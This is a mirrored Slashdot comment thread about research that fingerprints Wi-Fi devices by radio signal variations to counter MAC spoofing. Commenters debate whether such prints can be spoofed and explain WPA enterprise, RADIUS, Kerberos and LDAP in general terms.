Slashdot Mirror
Wi-Fi Fingerprints -- the End of MAC Spoofing?
judgecorp writes, "Wireless devices can be identified by variations in their radio signaling, known as their 'transceiverprint,' according to research reported in Techworld. The Canadian researcher, Jeyanthi Hall, related the prints to MAC addresses and got a positive ID for devices connecting to a Wi-Fi network, claiming 95% success with no false positives. Once they work out how to do this without a dedicated signal analyzer and neural network processing, it's the end of MAC spoofing on wireless networks."
This has been in the HAM community for years.
http://www.motron.com/TransmitterID.html
If you RTFA, you would have seen that manufacturing variations yield differences even among the exact make and model -- e.g. that minor circuitry, amplifiers and antenna variations differences yield a unique signature.
This is why you use WPA enterprise and not PSK.
Finkployd
There are variations in radios even among the same model. You can uniquely identify 2 separate radios of the same model pretty easily. This is something we have done to combat the squirrels (slang for the idiots who think it's fun to screw a ham repeater up) on our ham repeaters in our area....that and triangulation of the perp's signal. Nothing new and about time.
Gorkman
Cuz you likely can't. To do so would require a microscope on alot of WiFi cards and even then it you likely won't come close enough. The fingerprint is possible because of minor variations in the signal that is caused by variations in the caps and resistors used. You don't really think they can create a 0% tolerance cap do you?? The tolerances on caps and resistors can be 0.05%...that is still not 0%. A 0% tolerance cap or resistor is not possible. Spoofing a RF fingerprint is practically impossible with today's technology.
Gorkman
Most people can hack WPA in less than 20 minutes now a days if you are able to force a machine on the network to send out a lot of packets (not difficult to do either). Very easy to spoof mac address on a WPA encrypted network.
WPA-PSK can be cracked in small time too. If you use a RADIUS it's a lot harder (which may be what you're thinking), but with PSK you are just step harder to crack than WEP, not more secure.
Of Code And Men
Stuff I saw at DEFCON 14
multi-fpga array + 4 million passwords + 2000 SSIDs + 2 days? = 40GB rainbow table = fast WPA cracking. USE FULL STRENGTH PASSWORDS!
There are two types of people in the world: those who divide people into two types and those who don't.
These are cookie cutter devices. Their deltas are uber-thin. You'd need to resolve various characteristics to the femto-side of things. I'm sure that there's a lot of demand for high-resolution characterization gear out there that will slice things into ultra-tiny pieces, then have the ability to keep them in a useful db, then use that db to effectively serve as the gate of admittance control.
I don't think so.
Instead, a few little twigs will be used, and those twigs will define what's going on. Call it engineer SLOTH. Tolerances will be widened so that customer support problems don't occur. Once the routines are discovered (and it won't take long), then they'll be abused.... oops I mean cracked. The software that initially characterizes will need to be plenty smart to be able to prevent the same aforementioned customer service problems, and so it'll have slop, too. Add the slops together, and there's a hole. The 95% citation seems more like a salesperson's view of things. I'm far more skeptical. Look at how APs have evolved, as well as the chipsets for WiFoo (and read the book by the same name).
Go to Taiwan Inc and take a spectrum analyzer with you. I have. Throw a high-rate sampling scope and look at the waveforms. Now add in some heat. User positioning. Skew it with some general and contentious noise to slop it up. Tell me you can get that kind of accuracy then tell me that I can't take a similar chipset card and foo it up to make it fool some bozo pseudo-NSA sampler. Bah.
---- Teach Peace. It's Cheaper Than War.
In principle, yes this is possible, but not in practice. The error modulations color the smallest unit of modulation - the pulse. To "hide" the fingerprint, we would need to have a modulation capability at least one (and probably more) order of magnitude faster than what is being used to generate the pulse. While there likely are are DSP chips fast enough to do this - the one on your wireless card can't. From practical terms, why would your card be engineered to have greater modulation capability than the technology requires for communication? That wouldn't be very efficient. And oh-by-the-way, and faster modulation capability used to inject "noise" while approximating the pulse would also be composed of pulses (albeit smaller ones). These pulses would themselves be subject to exactly the same type of fingerprinting due to the same random fabrication errors.
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
I mostly have an idea of what Radius is. But not entirely. I didn't even know there was something called FreeRadius. So what solution is Radius for and where does it fit into the universe of LDAP / Kerberos / Active Directory / etc?
:)
now THAT's a deep question, but one I am happy to answer because I love this stuff
Basically, enterprise WPA (802.1x) needs a source to authenticate from. The protocol most used (only used?) is Radius - older protocol, not all that perfect but until Diameter comes out (yes, the follow-on to radius is called diameter) it is about all we got.
The central authentication system where I work is MIT Kerberos V (Active Directory also uses Kerberos V for authentication). This is ultimately where all userid's and passwords are stored. The beauty of Kerberos is that once can authenticate to and obtain a portable credential without ever sending the password over the wire (encrypted or not).
LDAP is where we store user profiles. Groups, attributes, etc. We do not authenticate to LDAP (although most places do it seems) simply because Kerberos is much better, more secure, and unlike LDAP, actually designed to do authentication, not a hacked on afterthought. You CAN authenticate to LDAP, but it involves passing your userID and password (hopefully over SSL) to the LDAP server. Some argue this is better and easier but I maintain that anything relying on PKI is more complicated than necessary (and you are not really doing PKI unless you have a robust certificate revocation system, which nobody does).
Not to mention that Kerberos allows for a signle sign on environment, and many network services accept kerberos credentials to log on (SSH, IMAP, NFS, AFS, etc).
Finkployd